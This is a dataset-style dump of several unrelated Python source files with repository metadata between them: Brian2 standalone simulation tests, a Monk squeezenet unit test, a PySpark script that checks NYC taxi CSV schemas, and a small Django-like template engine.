taupre = 20 * ms
taupost = taupre
dApost = -dApre * taupre / taupost * 1.05
dApost *= 0.1*gmax
dApre *= 0.1*gmax
connectivity = numpy.random.randn(n_cells, n_cells)
sources = numpy.random.random_integers(0, n_cells-1, 10*n_cells)
times = numpy.random.choice(numpy.arange(10*n_cells), 10*n_cells,
replace=False)*ms
v_init = Vr + numpy.random.rand(n_cells) * (Vt - Vr)
eqs = Equations('''
dv/dt = (g-(v-El))/taum : volt
dg/dt = -g/taus : volt
''')
results = {}
for (n_threads, devicename) in [(0, 'runtime'),
(0, 'cpp_standalone'),
(1, 'cpp_standalone'),
(2, 'cpp_standalone'),
(3, 'cpp_standalone'),
(4, 'cpp_standalone')]:
set_device(devicename, build_on_run=False, with_output=False)
Synapses.__instances__().clear()
if devicename=='cpp_standalone':
reinit_devices()
prefs.devices.cpp_standalone.openmp_threads = n_threads
P = NeuronGroup(n_cells, model=eqs, threshold='v>Vt', reset='v=Vr', refractory=5 * ms)
Q = SpikeGeneratorGroup(n_cells, sources, times)
P.v = v_init
P.g = 0 * mV
S = Synapses(P, P,
model = '''dApre/dt=-Apre/taupre : 1 (event-driven)
dApost/dt=-Apost/taupost : 1 (event-driven)
w : 1''',
pre = '''g += w*mV
Apre += dApre
w = w + Apost''',
post = '''Apost += dApost
w = w + Apre''')
S.connect()
S.w = fac*connectivity.flatten()
T = Synapses(Q, P, model = "w : 1", on_pre="g += w*mV")
T.connect(j='i')
T.w = 10*fac
spike_mon = SpikeMonitor(P)
rate_mon = PopulationRateMonitor(P)
state_mon = StateMonitor(S, 'w', record=range(n_recorded), dt=0.1*second)
v_mon = StateMonitor(P, 'v', record=range(n_recorded))
run(0.2 * second, report='text')
if devicename=='cpp_standalone':
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True,
run=True, with_output=with_output)
results[n_threads, devicename] = {}
results[n_threads, devicename]['w'] = state_mon.w
results[n_threads, devicename]['v'] = v_mon.v
results[n_threads, devicename]['s'] = spike_mon.num_spikes
results[n_threads, devicename]['r'] = rate_mon.rate[:]
for key1, key2 in [((0, 'runtime'), (0, 'cpp_standalone')),
((1, 'cpp_standalone'), (0, 'cpp_standalone')),
((2, 'cpp_standalone'), (0, 'cpp_standalone')),
((3, 'cpp_standalone'), (0, 'cpp_standalone')),
((4, 'cpp_standalone'), (0, 'cpp_standalone'))
]:
assert_allclose(results[key1]['w'], results[key2]['w'])
assert_allclose(results[key1]['v'], results[key2]['v'])
assert_allclose(results[key1]['r'], results[key2]['r'])
assert_allclose(results[key1]['s'], results[key2]['s'])
reset_device(previous_device)
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_timedarray(with_output=True):
set_device('cpp_standalone', build_on_run=False)
defaultclock.dt = 0.1*ms
ta1d = TimedArray(np.arange(10)*volt, dt=1*ms)
ta2d = TimedArray(np.arange(300).reshape(3, 100).T, dt=defaultclock.dt)
G = NeuronGroup(4, '''x = ta1d(t) : volt
y = ta2d(t, i) : 1''')
mon = StateMonitor(G, ['x', 'y'], record=True)
run(11*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True,
run=True, with_output=with_output)
for idx in xrange(4):
assert_equal(mon[idx].x[:],
np.clip(np.arange(11).repeat(10), 0, 9)*volt)
for idx in xrange(3):
assert_equal(mon[idx].y[:],
np.clip(np.arange(110), 0, 99) + idx*100)
assert_equal(mon[3].y[:], np.nan)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_duplicate_names_across_nets(with_output=True):
set_device('cpp_standalone', build_on_run=False)
obj1 = BrianObject(name='name1')
obj2 = BrianObject(name='name2')
obj3 = BrianObject(name='name3')
obj4 = BrianObject(name='name1')
net1 = Network(obj1, obj2)
net2 = Network(obj3, obj4)
net1.run(0*ms)
net2.run(0*ms)
assert_raises(ValueError, lambda: device.build())
reset_device()
@attr('cpp_standalone', 'standalone-only', 'openmp')
@with_setup(teardown=reinit_devices)
def test_openmp_scalar_writes(with_output=False):
set_device('cpp_standalone', build_on_run=False)
prefs.devices.cpp_standalone.openmp_threads = 4
G = NeuronGroup(10, 's : 1 (shared)')
G.run_regularly('s += 1')
run(defaultclock.dt)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
assert_equal(G.s[:], 1.0)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_time_after_run(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, 'dv/dt = -v/(10*ms) : 1')
net = Network(G)
assert_allclose(defaultclock.dt, 0.1*ms)
assert_allclose(defaultclock.t, 0.*ms)
assert_allclose(G.t, 0.*ms)
assert_allclose(net.t, 0.*ms)
net.run(10*ms)
assert_allclose(defaultclock.t, 10.*ms)
assert_allclose(G.t, 10.*ms)
assert_allclose(net.t, 10.*ms)
net.run(10*ms)
assert_allclose(defaultclock.t, 20.*ms)
assert_allclose(G.t, 20.*ms)
assert_allclose(net.t, 20.*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
assert_allclose(defaultclock.t, 20.*ms)
assert_allclose(G.t, 20.*ms)
assert_allclose(net.t, 20.*ms)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_array_cache(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, '''dv/dt = -v / (10*ms) : 1
w : 1
x : 1
y : 1
z : 1 (shared)''',
threshold='v>1')
S = Synapses(G, G, 'weight: 1', on_pre='w += weight')
S.connect(p=0.2)
S.weight = 7
assert_allclose(G.v, 0)
assert_allclose(G.w, 0)
assert_allclose(G.x, 0)
assert_allclose(G.y, 0)
assert_allclose(G.z, 0)
assert_allclose(G.i, np.arange(10))
assert_raises(NotImplementedError, lambda: S.weight[:])
# Setting variables with explicit values should not change anything
G.v = np.arange(10)+1
G.w = 2
G.y = 5
G.z = 7
assert_allclose(G.v, np.arange(10)+1)
assert_allclose(G.w, 2)
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
# But setting with code should invalidate them
G.x = 'i*2'
assert_raises(NotImplementedError, lambda: G.x[:])
# Make sure that the array cache does not allow to use incorrectly sized
# values to pass
assert_raises(ValueError, lambda: setattr(G, 'w', [0, 2]))
assert_raises(ValueError, lambda: G.w.__setitem__(slice(0, 4), [0, 2]))
run(10*ms)
# v is now no longer known without running the network
assert_raises(NotImplementedError, lambda: G.v[:])
# Neither is w, it is updated in the synapse
assert_raises(NotImplementedError, lambda: G.w[:])
# However, no code touches y or z
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
# i is read-only anyway
assert_allclose(G.i, np.arange(10))
# After actually running the network, everything should be accessible
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
assert all(G.v > 0)
assert all(G.w > 0)
assert_allclose(G.x, np.arange(10)*2)
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
assert_allclose(G.i, np.arange(10))
assert_allclose(S.weight, 7)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_active_flag_standalone(with_output=True):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(1, 'dv/dt = 1/ms : 1')
mon = StateMonitor(G, 'v', record=0)
mon.active = False
run(1*ms)
mon.active = True
G.active = False
run(1*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir)
# Monitor should start recording at 1ms
# Neurongroup should not integrate after 1ms (but should have integrated before)
assert_allclose(mon[0].t[0], 1*ms)
assert_allclose(mon[0].v, 1.0)
if __name__=='__main__':
# Print the debug output when testing this file only but not when running
# via nose test
for t in [
test_cpp_standalone,
test_dt_changes_between_runs_standalone,
test_multiple_connects,
test_storing_loading,
test_openmp_consistency,
test_timedarray,
test_duplicate_names_across_nets,
test_openmp_scalar_writes,
test_time_after_run,
test_array_cache,
test_active_flag_standalone
]:
t(with_output=True)
reinit_devices()
| false | true |
f7234e4d5b6767c9851cbf514a946c133a149a00 | 1,511 | py | Python | monk/system_unit_tests/keras/test_block_squeezenet_fire.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 542 | 2019-11-10T12:09:31.000Z | 2022-03-28T11:39:07.000Z | monk/system_unit_tests/keras/test_block_squeezenet_fire.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 117 | 2019-11-12T09:39:24.000Z | 2022-03-12T00:20:41.000Z | monk/system_unit_tests/keras/test_block_squeezenet_fire.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 246 | 2019-11-09T21:53:24.000Z | 2022-03-29T00:57:07.000Z | import os
import sys
sys.path.append("../../../../monk_v1/");
sys.path.append("../../../monk/");
import psutil
from keras_prototype import prototype
from compare_prototype import compare
from common import print_start
from common import print_status
import tensorflow as tf
if(tf.__version__[0] == '2'):
    # Fall back to the TF1 compatibility API when TensorFlow 2.x is
    # installed, since this test uses tf.placeholder (TF1-only).
    import tensorflow.compat.v1 as tf
    tf.disable_v2_behavior()
import numpy as np
def test_block_squeezenet_fire(system_dict):
    """Smoke-test building and compiling one squeezenet fire block.

    Increments the counters in `system_dict`, records any exception raised
    while constructing/tracing the block, and returns the updated dict.
    """
    test_name = "test_block_squeezenet_fire"
    run_test = True
    system_dict["total_tests"] += 1
    print_start(test_name, system_dict["total_tests"])
    if not run_test:
        # Kept for parity with the other generated tests; never taken here.
        system_dict["skipped_tests_lists"].append(test_name)
        print_status("Skipped")
        return system_dict
    try:
        gtf = prototype(verbose=0)
        gtf.Prototype("sample-project-1", "sample-experiment-1")
        network = [
            gtf.squeezenet_fire_block(squeeze_channels=16,
                                      expand_channels_1x1=32,
                                      expand_channels_3x3=64)
        ]
        gtf.Compile_Network(network, data_shape=(1, 64, 64), use_gpu=False)
        # Trace the compiled model once with a TF1 placeholder input.
        x = tf.placeholder(tf.float32, shape=(1, 64, 64, 1))
        y = gtf.system_dict["local"]["model"](x)
        system_dict["successful_tests"] += 1
        print_status("Pass")
    except Exception as e:
        system_dict["failed_tests_exceptions"].append(e)
        system_dict["failed_tests_lists"].append(test_name)
        print_status("Fail")
    return system_dict
| 29.627451 | 123 | 0.643283 | import os
import sys
sys.path.append("../../../../monk_v1/");
sys.path.append("../../../monk/");
import psutil
from keras_prototype import prototype
from compare_prototype import compare
from common import print_start
from common import print_status
import tensorflow as tf
if(tf.__version__[0] == '2'):
    # Fall back to the TF1 compatibility API when TensorFlow 2.x is
    # installed, since this test uses tf.placeholder (TF1-only).
    import tensorflow.compat.v1 as tf
    tf.disable_v2_behavior()
import numpy as np
def test_block_squeezenet_fire(system_dict):
forward = True;
test = "test_block_squeezenet_fire";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
gtf = prototype(verbose=0);
gtf.Prototype("sample-project-1", "sample-experiment-1");
network = [];
network.append(gtf.squeezenet_fire_block(squeeze_channels=16, expand_channels_1x1=32, expand_channels_3x3=64));
gtf.Compile_Network(network, data_shape=(1, 64, 64), use_gpu=False);
x = tf.placeholder(tf.float32, shape=(1, 64, 64, 1))
y = gtf.system_dict["local"]["model"](x);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
return system_dict
| true | true |
f7234f9a4fd191667252060f448ed976d9a2af05 | 681 | py | Python | src/config/ref/check_tlc_schemas.py | josh-lang/where-cycle | f5574040cbffa38f4ae78540712882cfdb32c036 | [
"MIT"
] | 21 | 2020-07-01T16:51:47.000Z | 2020-08-06T06:21:29.000Z | src/config/ref/check_tlc_schemas.py | josh-lang/where-cycle | f5574040cbffa38f4ae78540712882cfdb32c036 | [
"MIT"
] | 2 | 2021-09-08T21:24:49.000Z | 2022-03-01T23:10:39.000Z | src/config/ref/check_tlc_schemas.py | josh-lang/where-cycle | f5574040cbffa38f4ae78540712882cfdb32c036 | [
"MIT"
] | 2 | 2020-07-01T18:10:52.000Z | 2020-07-01T20:06:35.000Z | import boto3
from pyspark.sql import SparkSession
# Connect to the public NYC TLC S3 bucket and start a local Spark session.
s3 = boto3.resource('s3')
nyc_tlc = s3.Bucket('nyc-tlc')
spark = SparkSession.builder \
    .appName('check_tlc_schemas') \
    .getOrCreate()
# Print the inferred schema of every trip-data CSV in the bucket so
# schema differences across files can be compared.
for obj in nyc_tlc.objects.all():
    key = obj.key
    if key.startswith('trip data/') and key.endswith('.csv'):
        path = 's3a://nyc-tlc/' + key
        # Infer the schema from a 10% sample to keep the scan affordable.
        csv_df = spark.read.csv(
            path = path,
            header = True,
            inferSchema = True,
            enforceSchema = False,
            ignoreLeadingWhiteSpace = True,
            ignoreTrailingWhiteSpace = True,
            samplingRatio = 0.1
        )
        print(path)
        csv_df.printSchema()
| 25.222222 | 61 | 0.580029 | import boto3
from pyspark.sql import SparkSession
# Walk the public NYC TLC bucket and print each trip-data CSV's inferred
# schema so drift between files can be compared.
s3 = boto3.resource('s3')
nyc_tlc = s3.Bucket('nyc-tlc')

spark = (
    SparkSession.builder
    .appName('check_tlc_schemas')
    .getOrCreate()
)

for obj in nyc_tlc.objects.all():
    key = obj.key
    if not (key.startswith('trip data/') and key.endswith('.csv')):
        continue
    path = 's3a://nyc-tlc/' + key
    # Sample 10% of rows for schema inference to keep the scan cheap.
    frame = spark.read.csv(
        path=path,
        header=True,
        inferSchema=True,
        enforceSchema=False,
        ignoreLeadingWhiteSpace=True,
        ignoreTrailingWhiteSpace=True,
        samplingRatio=0.1,
    )
    print(path)
    frame.printSchema()
f723514c3ad26915fdb8e82e0db180b70ebd784e | 11,438 | py | Python | eveil/template.py | pjfichet/eveil | dfe0c340ac09050768f0b13024ddfec5ef2015b1 | [
"0BSD"
] | null | null | null | eveil/template.py | pjfichet/eveil | dfe0c340ac09050768f0b13024ddfec5ef2015b1 | [
"0BSD"
] | null | null | null | eveil/template.py | pjfichet/eveil | dfe0c340ac09050768f0b13024ddfec5ef2015b1 | [
"0BSD"
] | null | null | null | """A simple Python template renderer, for a nano-subset of Django syntax."""
# Comes from http://aosabook.org/en/500L/a-template-engine.html
# By Ned Batchelder (nedbatchelder.com)
# Hosted on https://github.com/aosabook/500lines/tree/master/template-engine/code
# Coincidentally named the same as http://code.activestate.com/recipes/496702/
# Modified by Pierre-Jean Fichet to suport more tests.
# And renamed template, class Template, etc., for convenience.
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import re
class TemplateSyntaxError(ValueError):
    """Signals a malformed construct encountered while parsing a template."""
class CodeBuilder(object):
    """Accumulates lines of Python source while tracking indentation."""

    INDENT_STEP = 4  # one level of PEP8 indentation

    def __init__(self, indent=0):
        self.code = []
        self.indent_level = indent

    def __str__(self):
        # Nested sections are CodeBuilder objects; str() recurses into them.
        return "".join(map(str, self.code))

    def add_line(self, line):
        """Append one line of source; indentation and newline are supplied."""
        prefix = " " * self.indent_level
        self.code += [prefix, line, "\n"]

    def add_section(self):
        """Reserve a nested sub-builder at the current position and return it."""
        sub = CodeBuilder(self.indent_level)
        self.code.append(sub)
        return sub

    def indent(self):
        """Indent subsequently added lines one level deeper."""
        self.indent_level += self.INDENT_STEP

    def dedent(self):
        """Un-indent subsequently added lines by one level."""
        self.indent_level -= self.INDENT_STEP

    def get_globals(self):
        """Execute the accumulated source; return the globals it defines."""
        # Every indent() must have been matched by a dedent() by now.
        assert self.indent_level == 0
        namespace = {}
        exec(str(self), namespace)
        return namespace
class Template(object):
    """A simple template renderer, for a nano-subset of Django syntax.
    Supported constructs are extended variable access::
        {{var.modifier.modifier|filter|filter}}
    loops::
        {% for var in list %}...{% endfor %}
    and ifs, including elif/else branches and two-sided comparisons::
        {% if var %}...{% elif other %}...{% else %}...{% endif %}
        {% if var == 3 %}...{% endif %}
    Comments are within curly-hash markers::
        {# This will be ignored #}
    Construct a Template with the template text, then use `render` against a
    dictionary context to create a finished string::
        template = Template('''
            <h1>Hello {{name|upper}}!</h1>
            {% for topic in topics %}
                <p>You are interested in {{topic}}.</p>
            {% endfor %}
            ''',
            {'upper': str.upper},
        )
        text = template.render({
            'name': "Ned",
            'topics': ['Python', 'Geometry', 'Juggling'],
        })
    """
    def __init__(self, text, *contexts):
        """Construct a Template with the given `text`.
        `contexts` are dictionaries of values to use for future renderings.
        These are good for filters and global values.
        """
        self.context = {}
        for context in contexts:
            self.context.update(context)
        self.all_vars = set()
        self.loop_vars = set()
        # We construct a function in source form, then compile it and hold onto
        # it, and execute it to render the template.
        code = CodeBuilder()
        code.add_line("def render_function(context, do_dots):")
        code.indent()
        # Section filled in at the end, once we know which context
        # variables the template actually uses.
        vars_code = code.add_section()
        code.add_line("result = []")
        code.add_line("append_result = result.append")
        code.add_line("extend_result = result.extend")
        code.add_line("to_str = str")
        buffered = []
        def flush_output():
            """Force `buffered` to the code builder."""
            if len(buffered) == 1:
                code.add_line("append_result(%s)" % buffered[0])
            elif len(buffered) > 1:
                code.add_line("extend_result([%s])" % ", ".join(buffered))
            del buffered[:]
        ops_stack = []
        # Split the text to form a list of tokens; the capturing group keeps
        # the {{...}}/{%...%}/{#...#} delimiters in the token list.
        tokens = re.split(r"(?s)({{.*?}}|{%.*?%}|{#.*?#})", text)
        for token in tokens:
            if token.startswith('{#'):
                # Comment: ignore it and move on.
                continue
            elif token.startswith('{{'):
                # An expression to evaluate.
                expr = self._expr_code(token[2:-2].strip())
                buffered.append("to_str(%s)" % expr)
            elif token.startswith('{%'):
                # Action tag: split into words and parse further.
                flush_output()
                words = token[2:-2].strip().split()
                if words[0] == 'if':
                    # An if statement: evaluate the expression to determine if.
                    if len(words) != 2 and len(words) != 4:
                        self._syntax_error("Don't understand if", token)
                    ops_stack.append('if')
                    code.add_line(self._test_code(words))
                    code.indent()
                elif words[0] == 'elif':
                    # An elif statement: evaluate the expression to determine if.
                    if len(words) != 2 and len(words) != 4:
                        self._syntax_error("Don't understand elif", token)
                    code.dedent()
                    code.add_line(self._test_code(words))
                    code.indent()
                elif words[0] == 'else':
                    # An else statement: no expression to evaluate.
                    if len(words) != 1:
                        self._syntax_error("Don't understand else", token)
                    code.dedent()
                    code.add_line("else:")
                    code.indent()
                elif words[0] == 'for':
                    # A loop: iterate over expression result.
                    if len(words) != 4 or words[2] != 'in':
                        self._syntax_error("Don't understand for", token)
                    ops_stack.append('for')
                    self._variable(words[1], self.loop_vars)
                    code.add_line(
                        "for c_%s in %s:" % (
                            words[1],
                            self._expr_code(words[3])
                        )
                    )
                    code.indent()
                elif words[0].startswith('end'):
                    # Endsomething.  Pop the ops stack.
                    if len(words) != 1:
                        self._syntax_error("Don't understand end", token)
                    end_what = words[0][3:]
                    if not ops_stack:
                        self._syntax_error("Too many ends", token)
                    start_what = ops_stack.pop()
                    if start_what != end_what:
                        self._syntax_error("Mismatched end tag", end_what)
                    code.dedent()
                else:
                    self._syntax_error("Don't understand tag", words[0])
            else:
                # Literal content.  If it isn't empty, output it.
                if token:
                    #spaces = re.compile('\s+')
                    #spaces.sub(' ', token)
                    buffered.append(repr(token))
        if ops_stack:
            self._syntax_error("Unmatched action tag", ops_stack[-1])
        flush_output()
        # Bind each non-loop context variable to a local at function start.
        for var_name in self.all_vars - self.loop_vars:
            vars_code.add_line("c_%s = context[%r]" % (var_name, var_name))
        code.add_line("return ''.join(result)")
        code.dedent()
        self._render_function = code.get_globals()['render_function']
    def _test_code(self, words):
        """Generate the `if`/`elif` test line for a 2- or 4-word tag.
        Two words ({% if var %}) tests truthiness; four words
        ({% if a == b %}) emits a comparison.  Quoted strings and digit
        literals are passed through unevaluated.
        """
        if len(words) == 2:
            code = "{} {}:".format(words[0], self._expr_code(words[1]))
        if len(words) == 4:
            expr1 = words[1]
            expr2 = words[3]
            if words[1][0] != '"' and words[1][0] != "'" and not words[1].isdigit():
                expr1 = self._expr_code(words[1])
            if words[3][0] != '"' and words[3][0] != "'" and not words[3].isdigit():
                expr2 = self._expr_code(words[3])
            code = "{} {} {} {}:".format(words[0], expr1, words[2], expr2)
        return code
    def _expr_code(self, expr):
        """Generate a Python expression for `expr` (pipes, dots, or a name)."""
        if "|" in expr:
            pipes = expr.split("|")
            code = self._expr_code(pipes[0])
            for func in pipes[1:]:
                self._variable(func, self.all_vars)
                code = "c_%s(%s)" % (func, code)
        elif "." in expr:
            dots = expr.split(".")
            code = self._expr_code(dots[0])
            args = ", ".join(repr(d) for d in dots[1:])
            code = "do_dots(%s, %s)" % (code, args)
        else:
            self._variable(expr, self.all_vars)
            code = "c_%s" % expr
        return code
    def _syntax_error(self, msg, thing):
        """Raise a syntax error using `msg`, and showing `thing`."""
        raise TemplateSyntaxError("%s: %r" % (msg, thing))
    def _variable(self, name, vars_set):
        """Track that `name` is used as a variable.
        Adds the name to `vars_set`, a set of variable names.
        Raises a syntax error if `name` is not a valid name.
        """
        if not re.match(r"[_a-zA-Z][_a-zA-Z0-9]*$", name):
            self._syntax_error("Not a valid name", name)
        vars_set.add(name)
    def render(self, context=None):
        """Render this template by applying it to `context`.
        `context` is a dictionary of values to use in this rendering.
        """
        # Make the complete context we'll use.
        render_context = dict(self.context)
        if context:
            render_context.update(context)
        return self._render_function(render_context, self._do_dots)
    def _do_dots(self, value, *dots):
        """Evaluate dotted expressions at runtime.
        Each dot tries attribute access first, then item access; callable
        results are called with no arguments.
        """
        for dot in dots:
            try:
                value = getattr(value, dot)
            except AttributeError:
                value = value[dot]
            if callable(value):
                value = value()
        return value
| 37.257329 | 84 | 0.550883 |
import re
class TemplateSyntaxError(ValueError):
    """Raised when a template has a syntax error."""
    pass
class CodeBuilder(object):
    """Builds Python source code incrementally, tracking indentation."""
    def __init__(self, indent=0):
        # `code` holds strings and nested CodeBuilder sections.
        self.code = []
        self.indent_level = indent
    def __str__(self):
        # Stringifying recurses into nested sections.
        return "".join(str(c) for c in self.code)
    def add_line(self, line):
        """Add one line of source; indentation and newline are supplied."""
        self.code.extend([" " * self.indent_level, line, "\n"])
    def add_section(self):
        """Insert and return a nested sub-builder at the current position."""
        section = CodeBuilder(self.indent_level)
        self.code.append(section)
        return section
    # One level of indentation (PEP8).
    INDENT_STEP = 4
    def indent(self):
        """Increase the indentation of subsequently added lines."""
        self.indent_level += self.INDENT_STEP
    def dedent(self):
        """Decrease the indentation of subsequently added lines."""
        self.indent_level -= self.INDENT_STEP
    def get_globals(self):
        """Execute the accumulated source; return the globals it defines."""
        # All indent()/dedent() calls must be balanced by now.
        assert self.indent_level == 0
        python_source = str(self)
        global_namespace = {}
        exec(python_source, global_namespace)
        return global_namespace
class Template(object):
    """A simple template renderer for a nano-subset of Django syntax.
    Supports ``{{var.attr|filter}}`` expressions, ``{% for %}`` loops,
    ``{% if %}/{% elif %}/{% else %}`` branches (including two-sided
    comparisons such as ``{% if a == b %}``), and ``{# comments #}``.
    The template text is compiled once, in __init__, into a Python
    function; `render` then just calls that function with a context dict.
    """
    def __init__(self, text, *contexts):
        """Compile `text`; `contexts` supply filters and global values."""
        self.context = {}
        for context in contexts:
            self.context.update(context)
        self.all_vars = set()
        self.loop_vars = set()
        # Build the render function as source text, then exec it.
        code = CodeBuilder()
        code.add_line("def render_function(context, do_dots):")
        code.indent()
        # Filled in at the end with the context-variable bindings.
        vars_code = code.add_section()
        code.add_line("result = []")
        code.add_line("append_result = result.append")
        code.add_line("extend_result = result.extend")
        code.add_line("to_str = str")
        buffered = []
        def flush_output():
            """Force `buffered` output fragments into the code builder."""
            if len(buffered) == 1:
                code.add_line("append_result(%s)" % buffered[0])
            elif len(buffered) > 1:
                code.add_line("extend_result([%s])" % ", ".join(buffered))
            del buffered[:]
        ops_stack = []
        # The capturing group keeps the tag delimiters in the token list.
        tokens = re.split(r"(?s)({{.*?}}|{%.*?%}|{#.*?#})", text)
        for token in tokens:
            if token.startswith('{#'):
                # Comment tag: ignored.
                continue
            elif token.startswith('{{'):
                # Expression tag: evaluate and append its string form.
                expr = self._expr_code(token[2:-2].strip())
                buffered.append("to_str(%s)" % expr)
            elif token.startswith('{%'):
                # Action tag: split into words and parse further.
                flush_output()
                words = token[2:-2].strip().split()
                if words[0] == 'if':
                    if len(words) != 2 and len(words) != 4:
                        self._syntax_error("Don't understand if", token)
                    ops_stack.append('if')
                    code.add_line(self._test_code(words))
                    code.indent()
                elif words[0] == 'elif':
                    # An elif statement: evaluate the expression to determine if.
                    if len(words) != 2 and len(words) != 4:
                        self._syntax_error("Don't understand elif", token)
                    code.dedent()
                    code.add_line(self._test_code(words))
                    code.indent()
                elif words[0] == 'else':
                    if len(words) != 1:
                        self._syntax_error("Don't understand else", token)
                    code.dedent()
                    code.add_line("else:")
                    code.indent()
                elif words[0] == 'for':
                    # A loop: iterate over expression result.
                    if len(words) != 4 or words[2] != 'in':
                        self._syntax_error("Don't understand for", token)
                    ops_stack.append('for')
                    self._variable(words[1], self.loop_vars)
                    code.add_line(
                        "for c_%s in %s:" % (
                            words[1],
                            self._expr_code(words[3])
                        )
                    )
                    code.indent()
                elif words[0].startswith('end'):
                    # end tag: must match the innermost open if/for.
                    if len(words) != 1:
                        self._syntax_error("Don't understand end", token)
                    end_what = words[0][3:]
                    if not ops_stack:
                        self._syntax_error("Too many ends", token)
                    start_what = ops_stack.pop()
                    if start_what != end_what:
                        self._syntax_error("Mismatched end tag", end_what)
                    code.dedent()
                else:
                    self._syntax_error("Don't understand tag", words[0])
            else:
                # Literal content: emit as-is if non-empty.
                if token:
                    #spaces = re.compile('\s+')
                    #spaces.sub(' ', token)
                    buffered.append(repr(token))
        if ops_stack:
            self._syntax_error("Unmatched action tag", ops_stack[-1])
        flush_output()
        # Bind each non-loop context variable to a local at function start.
        for var_name in self.all_vars - self.loop_vars:
            vars_code.add_line("c_%s = context[%r]" % (var_name, var_name))
        code.add_line("return ''.join(result)")
        code.dedent()
        self._render_function = code.get_globals()['render_function']
    def _test_code(self, words):
        """Generate the if/elif test line for a 2- or 4-word tag.
        Two words test truthiness; four words emit a comparison.  Quoted
        strings and digit literals pass through unevaluated.
        """
        if len(words) == 2:
            code = "{} {}:".format(words[0], self._expr_code(words[1]))
        if len(words) == 4:
            expr1 = words[1]
            expr2 = words[3]
            if words[1][0] != '"' and words[1][0] != "'" and not words[1].isdigit():
                expr1 = self._expr_code(words[1])
            if words[3][0] != '"' and words[3][0] != "'" and not words[3].isdigit():
                expr2 = self._expr_code(words[3])
            code = "{} {} {} {}:".format(words[0], expr1, words[2], expr2)
        return code
    def _expr_code(self, expr):
        """Generate a Python expression for `expr` (pipes, dots, or a name)."""
        if "|" in expr:
            pipes = expr.split("|")
            code = self._expr_code(pipes[0])
            for func in pipes[1:]:
                self._variable(func, self.all_vars)
                code = "c_%s(%s)" % (func, code)
        elif "." in expr:
            dots = expr.split(".")
            code = self._expr_code(dots[0])
            args = ", ".join(repr(d) for d in dots[1:])
            code = "do_dots(%s, %s)" % (code, args)
        else:
            self._variable(expr, self.all_vars)
            code = "c_%s" % expr
        return code
    def _syntax_error(self, msg, thing):
        """Raise TemplateSyntaxError using `msg`, showing `thing`."""
        raise TemplateSyntaxError("%s: %r" % (msg, thing))
    def _variable(self, name, vars_set):
        """Record `name` in `vars_set`; raise if it is not a valid identifier."""
        if not re.match(r"[_a-zA-Z][_a-zA-Z0-9]*$", name):
            self._syntax_error("Not a valid name", name)
        vars_set.add(name)
    def render(self, context=None):
        """Render this template against `context` (a dict) and return a str."""
        # Make the complete context we'll use.
        render_context = dict(self.context)
        if context:
            render_context.update(context)
        return self._render_function(render_context, self._do_dots)
    def _do_dots(self, value, *dots):
        """Evaluate dotted expressions at runtime.
        Each dot tries attribute access first, then item access; callable
        results are called with no arguments.
        """
        for dot in dots:
            try:
                value = getattr(value, dot)
            except AttributeError:
                value = value[dot]
            if callable(value):
                value = value()
        return value
| true | true |
f72351511f63b93866cb1821a8cb26e2db01b425 | 129 | py | Python | arknights/__init__.py | djkcyl/arknights | 63b72a4747ee6c59724d504a178c8685bf45ef67 | [
"MIT"
] | 5 | 2022-01-07T18:33:20.000Z | 2022-02-15T14:55:48.000Z | arknights/__init__.py | djkcyl/arknights | 63b72a4747ee6c59724d504a178c8685bf45ef67 | [
"MIT"
] | null | null | null | arknights/__init__.py | djkcyl/arknights | 63b72a4747ee6c59724d504a178c8685bf45ef67 | [
"MIT"
